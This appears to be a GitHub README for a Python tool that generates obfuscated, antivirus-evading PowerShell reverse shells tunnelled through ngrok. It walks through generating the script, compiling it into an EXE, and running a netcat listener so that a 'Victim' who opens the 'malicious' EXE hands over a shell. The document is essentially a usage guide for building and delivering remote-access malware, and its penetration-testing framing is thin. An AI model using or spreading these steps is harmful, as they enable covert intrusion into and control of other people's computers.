This tool generates an undetectable Windows reverse shell PowerShell script. Users can configure IP and Port according to their requirements. The generated script is obfuscated to avoid detection by antivirus software.
MIT License
The PowerShell Reverse Shell Generator Tool is designed to facilitate the creation of customizable, undetectable PowerShell scripts for establishing reverse shells on Windows systems. This tool allows security professionals and penetration testers to generate scripts that can be used for remote access and management in controlled environments.
Dynamic Configuration: Users can specify IP addresses and ports to customize generated scripts.
Obfuscation Techniques: Built-in support for obfuscation to evade antivirus detection.
Integration with ngrok: Uses Ngrok for tunneling, allowing reverse shell access over the internet.
Cross-Platform Compatibility: Python-based tool compatible with various operating systems.
This project devided into two parts:
Local Host: Tested between your virtual Machine and get reverse shell of your Virtual Windows, this is only for testing.
Ngrok Reverse Shell: Here You will generate the reverse shell that intergrate with ngrok and get reverse shell over the internet.
Clone the repository
git clone https://github.com/RED-TEAM-444/STEALTH-SHELL.git
Now go to cloned directory
V2-Ngrok
Setup Ngrok
Install ngrok
Authenticate ngrok
ngrok authtoken YOUR_AUTH_TOKEN
Run the Script
python3 main.py -p 4444
Save the output
Save the Obfuscated output in .ps1 file.
Example: reverse_shell.ps1
Transfer the .ps1
file into your Virtual Windows to convert it into executable form EXE
.
Install Win-PS2EXE.exe file in your Windows Machine from below methods and open it:
Directly download it from my repository
from here https://github.com/MScholtes/TechNet-Gallery/blob/master/PS2EXE-GUI/Win-PS2EXE.exe
Now Compile the reverse_shell.ps1
into reverse_shell.exe
Open Win-PS2EXE.
Select the .ps1
file in Source file that we will going to convert in EXE
.
Now, Select the target where you want to save the compile EXE
file according to your choice.
At last, compile it and you will get the EXE file that gonna use to generate reverse shell.
Start Netcat Listener on your Kali Machine
nc -lvp 4444
As soon as Victim trying to open our generated malicious reverse shell EXE
file it will generate the reverse shell on your Kali Machine.
sudo pip3 install requests
sudo apt install python3 python3-pip -y